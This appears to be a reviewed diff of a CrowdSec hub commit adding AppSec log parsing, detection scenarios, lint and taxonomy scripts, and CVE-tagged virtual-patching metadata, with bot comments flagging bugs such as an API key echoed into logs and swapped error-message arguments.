+ listen 7822;
+ server_name localhost;
+
+ location / {
+ root html;
+ index index.html index.htm;
+ }
+
+ error_page 500 502 503 504 /50x.html;
+ location = /50x.html {
+ root html;
+ }
+ }
+
+
+}
\ No newline at end of file
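Review bot: `resolver 127.0.0.11;` is Docker's embedded DNS, which is only served inside a container network; docker-compose.yaml in this commit runs the service with `network_mode: "host"`, where that address is not present, so any name resolution performed by the included crowdsec_openresty.conf would fail. Either drop `network_mode: host` and let the compose network provide DNS, or point the resolver at a host-reachable server. `worker_processes 4;` is hard-coded where `auto` follows the container's CPU allotment, and the file ends without a trailing newline.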
diff --git a/docker/appsec/start.sh b/docker/appsec/start.sh
new file mode 100644
index 00000000000..365515620fb
--- /dev/null
+++ b/docker/appsec/start.sh
@@ -0,0 +1,12 @@
+#!/bin/bash
+set -x
+
+# set the API URL
+sed -i "s@API_KEY=.*@API_KEY=${API_KEY}@" /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+sed -i "s@API_URL=.*@API_URL=${API_URL}@" /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+echo "APPSEC_URL=${APPSEC_URL}" | tee -a /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+
+cat /etc/crowdsec/bouncers/crowdsec-openresty-bouncer.conf
+
+# Start OpenResty
+exec openresty -g 'daemon off;'
\ No newline at end of file
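Review bot: `set -x` on the second line echoes every command with its expanded arguments, so the `API_KEY` value is written to stderr on each start, and the `cat` of the bouncer config then prints it again to stdout; both land in the container logs. Drop `set -x` (or wrap the `sed` lines in `set +x`/`set -x`) and the `cat`, or redact the key. The two `sed` substitutions also inject `${API_KEY}`/`${API_URL}` unescaped into the replacement, so a value containing `@`, `&` or `\` corrupts the config, and `tee -a` appends another `APPSEC_URL=` line on every restart when the config persists — use the same replace-or-append pattern for all three keys.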
diff --git a/generate.go b/generate.go
index 7f7c1878d57..76358e0e6e0 100644
--- a/generate.go
+++ b/generate.go
@@ -3,7 +3,6 @@ package main
import (
"encoding/base64"
"fmt"
- "io/ioutil"
"log"
"os"
"path"
@@ -14,14 +13,14 @@ import (
"gopkg.in/yaml.v2"
)
-func inSlice(s string, slice []string) bool {
- for _, str := range slice {
- if str == s {
- return true
- }
- }
- return false
-}
+const (
+ PARSER_TYPE = "parsers"
+ SCENARIO_TYPE = "scenarios"
+ POSTOVERFLOW_TYPE = "postoverflows"
+ APPSEC_RULES_TYPE = "appsec-rules"
+ APPSEC_CONFIGS_TYPE = "appsec-configs"
+ COLLECTIONS_TYPE = "collections"
+)
func (ti *typeInfo) generate(filepath string, configType string) (string, error) {
pathSplit := strings.Split(filepath, "/")
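Review bot: The new constants `PARSER_TYPE` … `COLLECTIONS_TYPE` use SCREAMING_SNAKE_CASE, which Go style (and staticcheck ST1003) rejects; Go constants are MixedCaps, e.g. `parserType`, `scenarioType`, `appsecRulesType`. They also duplicate the string literals in the `types` slice in ci.go (same `main` package), so that slice could be built from these constants to keep the two lists from drifting — the commit added `"appsec-rules"`/`"appsec-configs"` to both by hand. Removing the unused `inSlice` helper is fine.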
@@ -39,28 +38,25 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
// set user, stage and config name
var user string
var configName string
- if configType == "parsers" || configType == "postoverflows" {
+
+ switch configType {
+ case PARSER_TYPE, POSTOVERFLOW_TYPE:
if len(pathSplit) != 3 {
- return "", fmt.Errorf("invalid filepath '%s', should be : './%s///'", configType, filepath)
+ return "", fmt.Errorf("invalid filepath '%s', should be : './%s//'", configType, filepath)
}
ti.Stage = pathSplit[0]
user = pathSplit[1]
configName = pathSplit[2]
configName = strings.Split(configName, ".")[0]
- } else if configType == "scenarios" {
- if len(pathSplit) != 2 {
- return "", fmt.Errorf("invalid filepath '%s', should be : './scenarios//'", filepath)
- }
- user = pathSplit[0]
- configName = pathSplit[1]
- configName = strings.Split(configName, ".")[0]
- } else if configType == "collections" {
+ case SCENARIO_TYPE, APPSEC_RULES_TYPE, APPSEC_CONFIGS_TYPE, COLLECTIONS_TYPE:
if len(pathSplit) != 2 {
- return "", fmt.Errorf("invalid filepath '%s', should be : './collections//'", filepath)
+ return "", fmt.Errorf("invalid filepath '%s', should be : './%s//'", configType, filepath)
}
user = pathSplit[0]
configName = pathSplit[1]
configName = strings.Split(configName, ".")[0]
+ default:
+ return "", fmt.Errorf("invalid config type '%s'", configType)
}
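Review bot: Both `fmt.Errorf` calls on the new lines pass `configType, filepath`, but the format string quotes the filepath first (`invalid filepath '%s', should be : './%s//'`), so the message prints the type where the path belongs and vice versa; the second call newly introduces this swap for scenario/collection/appsec paths (the old line passed only `filepath`). Swap the arguments in both places: `return "", fmt.Errorf("invalid filepath '%s', should be : './%s//'", filepath, configType)`. The template `'./%s//'` also looks as if it lost its placeholders (possibly `<...>` text dropped in rendering) — check the real source. `generate` continues outside this hunk.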
// set the filepath
@@ -72,7 +68,7 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
/* Get description, author and references from the file */
var fInfo fileInfo
- yamlFile, err := ioutil.ReadFile(filepath)
+ yamlFile, err := os.ReadFile(filepath)
if err != nil {
return "", err
}
@@ -123,6 +119,16 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
} else {
ti.Collections = nil
}
+ if len(fInfo.AppsecRules) > 0 {
+ ti.AppsecRules = fInfo.AppsecRules
+ } else {
+ ti.AppsecRules = nil
+ }
+ if len(fInfo.AppsecConfigs) > 0 {
+ ti.AppsecConfigs = fInfo.AppsecConfigs
+ } else {
+ ti.AppsecConfigs = nil
+ }
}
// versions informations (digest and deprecated for each version)
@@ -162,7 +168,7 @@ func (ti *typeInfo) generate(filepath string, configType string) (string, error)
hubName := fmt.Sprintf("%s/%s", user, configName)
/*if we're all good, check if markdown documentation exists and join it*/
//pdocpath
- mdFile, err := ioutil.ReadFile(pdocpath)
+ mdFile, err := os.ReadFile(pdocpath)
if err == nil {
ti.LongDescription = base64.StdEncoding.EncodeToString([]byte(string(mdFile)))
}
@@ -193,7 +199,7 @@ func generateIndex(configType string) (map[string]typeInfo, error) {
var err error
hubName, err = info.generate(filepath, configType)
if err != nil {
- fmt.Printf("skipping '%s' because : %s\n", filepath, err.Error())
+ fmt.Printf("skipping '%s' for index generation because : %s\n", filepath, err.Error())
} else {
tInfo[hubName] = info
}
diff --git a/parsers/s01-parse/crowdsecurity/appsec-logs.yaml b/parsers/s01-parse/crowdsecurity/appsec-logs.yaml
new file mode 100644
index 00000000000..185d5bf54fe
--- /dev/null
+++ b/parsers/s01-parse/crowdsecurity/appsec-logs.yaml
@@ -0,0 +1,27 @@
+onsuccess: next_stage
+format: 3.0
+#debug: true
+filter: "evt.Parsed.program == 'appsec'"
+name: crowdsecurity/appsec-logs
+description: "Parse Appsec events"
+statics:
+ - meta: service
+ value: appsec
+ - meta: source_ip
+ expression: "evt.Parsed.source_ip"
+ - meta: target_host
+ expression: "evt.Parsed.target_host"
+ - meta: request_uuid
+ expression: "evt.Parsed.req_uuid"
+ - meta: target_uri
+ expression: "evt.Parsed.target_uri"
+#was the request blocked ?
+ - meta: log_type
+ expression: |
+ evt.Appsec.HasInBandMatches ? "appsec-block" : "appsec-info"
+ - meta: rule_name
+ expression: evt.Appsec.GetName()
+ - meta: rule_ids
+ expression: Sprintf("%+v", evt.Appsec.GetRuleIDs())
+ - meta: remediation_cmpt_ip
+ expression: "evt.Parsed.remediation_cmpt_ip"
diff --git a/parsers/s01-parse/crowdsecurity/caddy-logs.yaml b/parsers/s01-parse/crowdsecurity/caddy-logs.yaml
index 4f922c969fb..c311188198b 100644
--- a/parsers/s01-parse/crowdsecurity/caddy-logs.yaml
+++ b/parsers/s01-parse/crowdsecurity/caddy-logs.yaml
@@ -1,6 +1,5 @@
filter: "evt.Parsed.program startsWith 'caddy' && UnmarshalJSON(evt.Parsed.message, evt.Unmarshaled, 'caddy') in ['', nil]"
onsuccess: next_stage
-debug: true
name: crowdsecurity/caddy-logs
description: "Parse caddy logs"
statics:
diff --git a/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml b/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml
index 40561328905..8c271e116f2 100644
--- a/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml
+++ b/parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml
@@ -1,5 +1,4 @@
onsuccess: next_stage
-debug: true
name: crowdsecurity/palo-alto-threat-log
description: "Parse palo-alto-threat-log logs"
filter: "evt.Parsed.program == 'palo-alto-threat'"
diff --git a/scenarios/crowdsecurity/appsec-vpatch.yaml b/scenarios/crowdsecurity/appsec-vpatch.yaml
new file mode 100644
index 00000000000..88e28ba4fcb
--- /dev/null
+++ b/scenarios/crowdsecurity/appsec-vpatch.yaml
@@ -0,0 +1,19 @@
+type: leaky
+format: 3.0
+name: crowdsecurity/appsec-vpatch
+description: "Detect appsec attacks"
+filter: "evt.Meta.log_type == 'appsec-block'"
+distinct: evt.Meta.rule_name
+leakspeed: "60s"
+capacity: 1
+groupby: evt.Meta.source_ip
+blackhole: 1m
+labels:
+ service: http
+ confidence: 3
+ spoofable: 0
+ classification:
+ - attack.T1110
+ label: "appsec blocked"
+ behavior: "http:exploit"
+ remediation: true
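Review bot: `classification:` / `- attack.T1110` tags this scenario as Brute Force, but it triggers on `appsec-block` events produced by exploit rules and carries `behavior: "http:exploit"`; the sibling crowdsec-appsec-inband.yaml uses `attack.T1190` for the same kind of event. Change it to `- attack.T1190` so the taxonomy check and the behaviour label agree. If the taxonomy expects a `type` under labels (the outofband scenario sets `type: exploit`), add it here too.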
diff --git a/scenarios/crowdsecurity/crowdsec-appsec-inband.yaml b/scenarios/crowdsecurity/crowdsec-appsec-inband.yaml
new file mode 100644
index 00000000000..a0c37115e0f
--- /dev/null
+++ b/scenarios/crowdsecurity/crowdsec-appsec-inband.yaml
@@ -0,0 +1,19 @@
+type: leaky
+filter: evt.Parsed.program == 'crowdsec-appsec' && evt.Appsec.HasInBandMatches == true && evt.Parsed.action in ["deny", "drop"]
+#debug: true
+name: crowdsecurity/crowdsec-appsec-inband
+description: IP has triggered multiples In Band CrowdSec appsec rules
+blackhole: 1m
+leakspeed: 30s
+capacity: 1
+groupby: evt.Meta.source_ip
+distinct: evt.Appsec.GetName()
+labels:
+ confidence: 3
+ spoofable: 0
+ classification:
+ - attack.T1190
+ behavior: "http:exploit"
+ label: "Triggered multiple inband CrowdSec appsec rules"
+ service: http
+ remediation: true
diff --git a/scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml b/scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml
new file mode 100644
index 00000000000..a638dc36999
--- /dev/null
+++ b/scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml
@@ -0,0 +1,51 @@
+# just count distinct number of requests getting blocked
+type: leaky
+filter: evt.Parsed.program == 'crowdsec-waap' && evt.Appsec.HasInBandMatches == false && evt.Parsed.action in ["deny", "drop"]
+name: crowdsecurity/crowdsec-appsec-outofband
+description: IP has triggered more than 5 CrowdSec Out Of Band Waap rules
+blackhole: 2m
+leakspeed: 30s
+capacity: 5
+labels:
+ type: exploit
+ remediation: true
+groupby: "evt.Meta.source_ip"
+#---
+# at least requests blocked on 3 distinct URIs
+#type: leaky
+#debug: true
+#filter: evt.Parsed.program == 'crowdsec-waap' && evt.Parsed.action == "deny"
+#name: crowdsecurity/waf-probing
+#description: "WAF probing"
+#blackhole: 2m
+#leakspeed: 60s
+#capacity: 5
+#groupby: "evt.Meta.source_ip + evt.Parsed.target_uri"
+#labels:
+# type: exploit
+# remediation: true
+#---
+# # at least 5 requests blocked with **distinct** IDs
+#type: conditional
+#debug: true
+#name: crowdsecurity/xss-probing
+#description: at least 5 different XSS rules
+#filter: evt.Parsed.program == 'crowdsec-waap' && evt.Parsed.action == "deny"
+#condition: len( distinct( merge( all(evt.Queue, { #.Waap.GetIDs()}) ) ) ) > 5
+#condition: |
+# LogInfo("%+v", FlattenDistinct(
+# map( queue.Queue,
+# #.Waap.ByTagRx(".*xss.*").GetRuleIDs()
+# )
+# )) &&
+# len(
+# FlattenDistinct(
+# map( queue.Queue,
+# #.Waap.ByTagRx(".*xss.*").GetRuleIDs()
+# )
+# )) > 5
+#condition: 'Distance("aa", "bb", "cc", { #.Parsed.toto == 1 })'
+#capacity: -1
+#cache_size: 1000
+#leakspeed: 30s
+#distinct: evt.Meta.source_ip
\ No newline at end of file
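Review bot: This scenario's `labels` block has only `type` and `remediation` — no `classification`, `behavior`, `label` or `service` — so the updated scripts/scenario_taxonomy.py in this commit, which reports `attack` not found in labels.classification`, will reject it unless it is listed in scripts/.scenariosignore (only base-config and crs were added there). Its `description` and filter still say `Waap`/`crowdsec-waap` while the sibling inband scenario uses `crowdsec-appsec`. The roughly forty commented-out lines after `#---` are two abandoned scenario drafts; keep them in an issue or a branch rather than shipping them in the hub file.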
diff --git a/scripts/.scenariosignore b/scripts/.scenariosignore
index 6a9041e08ef..e4296b3ba6b 100644
--- a/scripts/.scenariosignore
+++ b/scripts/.scenariosignore
@@ -3,3 +3,5 @@ crowdsecurity/postscreen-rbl
crowdsecurity/postfix-spam
crowdsecurity/palo-alto-threat
crowdsecurity/exim-spam
+crowdsecurity/base-config
+crowdsecurity/crs
\ No newline at end of file
diff --git a/scripts/appsec_vpatch_lint.py b/scripts/appsec_vpatch_lint.py
new file mode 100644
index 00000000000..71c21de26a3
--- /dev/null
+++ b/scripts/appsec_vpatch_lint.py
@@ -0,0 +1,99 @@
+import os
+import yaml
+import argparse
+from yaml.loader import SafeLoader
+
+VPATCH_COLLECTION_FILEPATH = "./collections/crowdsecurity/appsec-virtual-patching.yaml"
+VPATCH_COLLECTION_NAME = "crowdsecurity/appsec-virtual-patching"
+WORKFLOW_FILEPATH = ".github/workflows/appsec_vpatch_lint.yaml"
+SCRIPT_FILEPATH = "scripts/appsec_vpatch_lint.py"
+author = os.environ.get("AUTHOR", "ghost")
+
+INTRO_STR = f"""
+Hello @{author} and thank you for your contribution!
+
+It seems that the following scenarios are not part of the '{VPATCH_COLLECTION_NAME}' collection:
+
+"""
+
+OK_STR = f"""
+Hello @{author},
+
+The new VPATCH Rule is compliant, thank you for your contribution!
+"""
+
+
+def main():
+ args = parse_args()
+ if args.hub == "":
+ print("[-] Please provide the hub path with the --hub argument")
+ sys.exit(1)
+
+ changed_files = os.environ.get("changed_files", "").split(",")
+ if (
+ changed_files == [""]
+ or WORKFLOW_FILEPATH
+ in changed_files # if the workflow file has been modified, we want to run the script on all rules
+ or SCRIPT_FILEPATH
+ in changed_files # if the script has been modified, we want to run it on all rules
+ ):
+ changed_files = []
+ print("[-] No changed files found, run on all files.")
+ else:
+ print("[+] Changed files: {}".format(changed_files))
+
+ vpatch_collection = yaml.load(
+ open(VPATCH_COLLECTION_FILEPATH, "r"), Loader=SafeLoader
+ )
+ vpatch_collection_rules = vpatch_collection["appsec-rules"]
+ missing_rules = list()
+
+ hub_appsecrules_path = os.path.join(args.hub, "appsec-rules")
+ for r, d, f in os.walk(hub_appsecrules_path):
+ for file in f:
+ if file.endswith(".yaml") or file.endswith(".yml"):
+ if len(changed_files) == 0 or (
+ len(changed_files) > 0 and file in changed_files
+ ):
+ if not file.startswith("vpatch-"):
+ continue
+ f = open(os.path.join(r, file), "r")
+ data = list(yaml.load_all(f, Loader=SafeLoader))
+ print("[*] Processing rule '{}'".format(file))
+ for rule in data:
+ if rule["name"] not in vpatch_collection_rules:
+ missing_rules.append(rule["name"])
+
+ f = open(args.errors, "w")
+ if len(missing_rules) > 0:
+ f.write(INTRO_STR)
+ for rule in missing_rules:
+ f.write("**{}**\n".format(rule))
+ else:
+ f.write(OK_STR)
+
+ f.close()
+
+
+def parse_args():
+ parser = argparse.ArgumentParser(
+ description="Generate CrowdSec Scenarios taxonomy file"
+ )
+ parser.add_argument("--hub", type=str, help="Hub folder path", default=".")
+ parser.add_argument(
+ "-e",
+ "--errors",
+ type=str,
+ help="Output errors file path",
+ default="./appsec_vpatch_cve_error.md",
+ )
+
+ parser.add_argument(
+ "-v", "--verbose", action="store_true", help="Verbose mode", default=False
+ )
+
+ return parser.parse_args()
+
+
+if __name__ == "__main__":
+ main()
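Review bot: `sys.exit(1)` in `main` references `sys`, which is never imported, so the `--hub ""` guard raises `NameError` instead of exiting cleanly; add `import sys` at the top of the file. The YAML files and the errors file are opened without `with`, so handles leak on error paths (`f.close()` is only reached on the happy path); `with open(...) as f:` fixes both. The `file in changed_files` test compares a bare filename against whatever the `changed_files` environment variable holds — if the workflow passes repository-relative paths, as the name suggests, the comparison never matches and every run silently degrades to the all-rules path; compare `os.path.relpath(os.path.join(r, file))` instead, and note that `--verbose` is parsed but never used.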
diff --git a/scripts/scenario_taxonomy.py b/scripts/scenario_taxonomy.py
index a656b80ed0c..fb53ff8ee22 100644
--- a/scripts/scenario_taxonomy.py
+++ b/scripts/scenario_taxonomy.py
@@ -6,15 +6,17 @@
import yaml
import argparse
from yaml.loader import SafeLoader
+from itertools import chain
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,7}")
+CWE_RE = re.compile(r"CWE-\d{2,6}")
author = os.environ.get("AUTHOR", "ghost")
OK_STR = f"""
Hello @{author},
-Scenarios are compliant with the taxonomy, thank you for your contribution!
+Scenarios/AppSec Rule are compliant with the taxonomy, thank you for your contribution!
"""
INTRO_STR = f"""
@@ -23,7 +25,7 @@
I'm a bot that helps maintainers to validate scenarios and ensure they include all the required information.
I've found some errors in your scenarios, please fix them and re-submit your PR, or ask for help if you need it.
-The following scenarios have errors:
+The following items have errors:
"""
@@ -128,6 +130,26 @@ def get_mitre_techniques_from_label(labels, mitre_data):
return ret, errors
+def get_cwe_from_label(labels):
+ ret = list()
+ errors = list()
+ if "classification" not in labels:
+ return ret, errors
+
+ for classification in labels["classification"]:
+ split_cwe = classification.split(".")
+ if split_cwe[0] != "cwe":
+ continue
+ cwe = split_cwe[1].upper()
+
+ if CWE_RE.match(cwe) == None:
+ errors.append("bad CWE format: {}".format(cwe))
+ continue
+ ret.append(cwe)
+
+ return ret, errors
+
+
def get_cve_from_label(labels):
ret = list()
errors = list()
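Review bot: `get_cwe_from_label` raises `IndexError` on a classification that is exactly `cwe` with no suffix, because `split_cwe[1]` is read without checking the split produced two parts. The format check also only anchors the start of the string (`CWE_RE.match`), so a value like `CWE-89x` is accepted and lands in the taxonomy; `fullmatch` is what is intended here, and `== None` should be `is None`. The hunk below shows the guarded loop body; the rest of the function is unchanged.
```python
for classification in labels["classification"]:
    split_cwe = classification.split(".")
    if split_cwe[0] != "cwe":
        continue
    # a bare "cwe" label has no identifier to validate
    if len(split_cwe) != 2:
        errors.append("bad CWE format: {}".format(classification))
        continue
    cwe = split_cwe[1].upper()

    # fullmatch: reject trailing garbage, not just a bad prefix
    if CWE_RE.fullmatch(cwe) is None:
        errors.append("bad CWE format: {}".format(cwe))
        continue
    ret.append(cwe)
# … unchanged: return ret, errors …
```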
@@ -165,7 +187,7 @@ def main():
stats = {"scenarios_ok": [], "scenarios_nok": [], "mitre": [], "behaviors": []}
hub_scenarios_path = os.path.join(args.hub, "scenarios")
-
+ hub_appsecrules_path = os.path.join(args.hub, "appsec-rules")
ignore_list = list()
if os.path.exists(args.ignore):
ignore_list = open(args.ignore).read().split("\n")
@@ -174,7 +196,9 @@ def main():
scenarios_taxonomy = dict()
filepath_list = []
- for r, d, f in os.walk(hub_scenarios_path):
+ for r, d, f in chain.from_iterable(
+ os.walk(path) for path in [hub_scenarios_path, hub_appsecrules_path]
+ ):
for file in f:
if file.endswith(".yaml") or file.endswith(".yml"):
filepath_list.append(os.path.join(r, file))
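Review bot: `os.walk` yields nothing and raises nothing when the directory does not exist (its default `onerror` swallows the scandir failure), so a missing or mistyped `appsec-rules` folder under `--hub` makes the new rules silently drop out of the taxonomy rather than fail the run. A cheap guard before the loop, `if not os.path.isdir(hub_appsecrules_path): print("[!] missing {}".format(hub_appsecrules_path))`, or passing `onerror=` to `os.walk`, would surface that. `main` starts and ends outside this hunk.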
@@ -183,6 +207,7 @@ def main():
cpt = 0
mitres = dict()
for filepath in filepath_list:
+ print("[+] Processing {}".format(filepath))
f = open(filepath, "r")
data = list(yaml.load_all(f, Loader=SafeLoader))
@@ -209,7 +234,6 @@ def main():
if len(mitre_techniques) == 0:
scenario_errors.append("`attack` not found in labels.classification")
-
service = labels.get("service", None)
for m in mitre_techniques:
@@ -229,6 +253,8 @@ def main():
cves, cves_errors = get_cve_from_label(labels)
scenario_errors.extend(cves_errors)
+ cwes, cwes_errors = get_cwe_from_label(labels)
+ scenario_errors.extend(cwes_errors)
scenario_label = ""
confidence = 0
@@ -281,6 +307,8 @@ def main():
if len(scenario_errors) > 0 and filepath[2:] in changed_files:
errors[scenario["name"]] = scenario_errors
stats["scenarios_nok"].append(scenario["name"])
+ else:
+ stats["scenarios_ok"].append(scenario["name"])
scenarios_taxonomy[scenario["name"]] = {
"name": scenario["name"],
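Review bot: The new `else:` makes `stats["scenarios_ok"]` absorb every scenario that has errors but whose path is not in `changed_files`, because the `if` condition combines the error check with the changed-file check; before this change `scenarios_ok` was appended unconditionally (the line removed further down), so a scenario with errors could appear in both lists, which this presumably meant to fix. If the intent is that only changed files are reported but the stats stay truthful, gate only the `errors[...]` assignment on `changed_files` and key both stats on `scenario_errors` alone. The enclosing loop and `main` continue outside this hunk.
```python
if len(scenario_errors) > 0:
    stats["scenarios_nok"].append(scenario["name"])
    # only changed files are reported back to the contributor
    if filepath[2:] in changed_files:
        errors[scenario["name"]] = scenario_errors
else:
    stats["scenarios_ok"].append(scenario["name"])
# … unchanged: scenarios_taxonomy[scenario["name"]] = { … } …
```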
@@ -294,10 +322,10 @@ def main():
"service": service,
}
- stats["scenarios_ok"].append(scenario["name"])
-
if len(cves) > 0:
scenarios_taxonomy[scenario["name"]]["cves"] = cves
+ if len(cwes) > 0:
+ scenarios_taxonomy[scenario["name"]]["cwes"] = cwes
f = open(args.output, "w")
f.write(json.dumps(scenarios_taxonomy, indent=2))
diff --git a/taxonomy/scenarios.json b/taxonomy/scenarios.json
index 7c9c8963edc..c7a52a70399 100644
--- a/taxonomy/scenarios.json
+++ b/taxonomy/scenarios.json
@@ -1,4 +1,441 @@
{
+ "crowdsecurity/vpatch-CVE-2017-9841": {
+ "name": "crowdsecurity/vpatch-CVE-2017-9841",
+ "description": "Detect CVE-2017-9841 exploits ",
+ "label": "PHPUnit RCE (CVE-2017-9841)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2017-9841"
+ ],
+ "cwes": [
+ "CWE-94"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2019-12989": {
+ "name": "crowdsecurity/vpatch-CVE-2019-12989",
+ "description": "Detect CVE-2019-12989 exploits ",
+ "label": "citrix SQLi (CVE-2019-12989)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2019-12989"
+ ],
+ "cwes": [
+ "CWE-89"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2020-11738": {
+ "name": "crowdsecurity/vpatch-CVE-2020-11738",
+ "description": "Detect CVE-2020-11738 exploits ",
+ "label": "Wordpress Snap Creek Duplicator (CVE-2020-11738)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2020-11738"
+ ],
+ "cwes": [
+ "CWE-22"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2021-22941": {
+ "name": "crowdsecurity/vpatch-CVE-2021-22941",
+ "description": "Detect CVE-2021-22941 exploits ",
+ "label": "Citrix RCE (CVE-2021-22941)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2021-22941"
+ ],
+ "cwes": [
+ "CWE-284"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2021-3129": {
+ "name": "crowdsecurity/vpatch-CVE-2021-3129",
+ "description": "Detect CVE-2021-3129 exploits ",
+ "label": "Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution (CVE-2021-3129)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2021-3129"
+ ],
+ "cwes": [
+ "CWE-98"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2022-27926": {
+ "name": "crowdsecurity/vpatch-CVE-2022-27926",
+ "description": "Detect CVE-2022-27926 exploits ",
+ "label": "Zimbra Collaboration (ZCS) - Cross Site Scripting (CVE-2022-27926)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2022-27926"
+ ],
+ "cwes": [
+ "CWE-79"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2022-35914": {
+ "name": "crowdsecurity/vpatch-CVE-2022-35914",
+ "description": "Detect CVE-2022-35914 exploits ",
+ "label": "GLPI <=10.0.2 - Remote Command Execution (CVE-2022-35914)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2022-35914"
+ ],
+ "cwes": [
+ "CWE-74"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2022-44877": {
+ "name": "crowdsecurity/vpatch-CVE-2022-44877",
+ "description": "Detect CVE-2022-44877 exploits ",
+ "label": "CentOS Web Panel 7 RCE (CVE-2022-44877)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2022-44877"
+ ],
+ "cwes": [
+ "CWE-78"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2022-46169": {
+ "name": "crowdsecurity/vpatch-CVE-2022-46169",
+ "description": "Detect CVE-2022-46169 exploits ",
+ "label": "Cacti <=1.2.22 - Remote Command Injection (CVE-2022-46169)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2022-46169"
+ ],
+ "cwes": [
+ "CWE-74",
+ "CWE-77",
+ "CWE-78",
+ "CWE-863"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-20198": {
+ "name": "crowdsecurity/vpatch-CVE-2023-20198",
+ "description": "Detect CVE-2023-20198 exploits ",
+ "label": "CISCO IOS XE account creation (CVE-2023-20198)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-20198"
+ ],
+ "cwes": [
+ "CWE-287"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-22515": {
+ "name": "crowdsecurity/vpatch-CVE-2023-22515",
+ "description": "Detect CVE-2023-22515 exploits ",
+ "label": "Atlassian Confluence Privesc (CVE-2023-22515)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-22515"
+ ],
+ "cwes": [
+ "CWE-284"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-24489": {
+ "name": "crowdsecurity/vpatch-CVE-2023-24489",
+ "description": "Detect CVE-2023-24489 exploits ",
+ "label": "Citrix ShareFile RCE (CVE-2023-24489)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-24489"
+ ],
+ "cwes": [
+ "CWE-284"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-33617": {
+ "name": "crowdsecurity/vpatch-CVE-2023-33617",
+ "description": "Detect CVE-2023-33617 exploits ",
+ "label": "Atlassian Confluence Privesc (CVE-2023-33617)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-33617"
+ ],
+ "cwes": [
+ "CWE-78"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-34362": {
+ "name": "crowdsecurity/vpatch-CVE-2023-34362",
+ "description": "Detect CVE-2023-34362 exploits ",
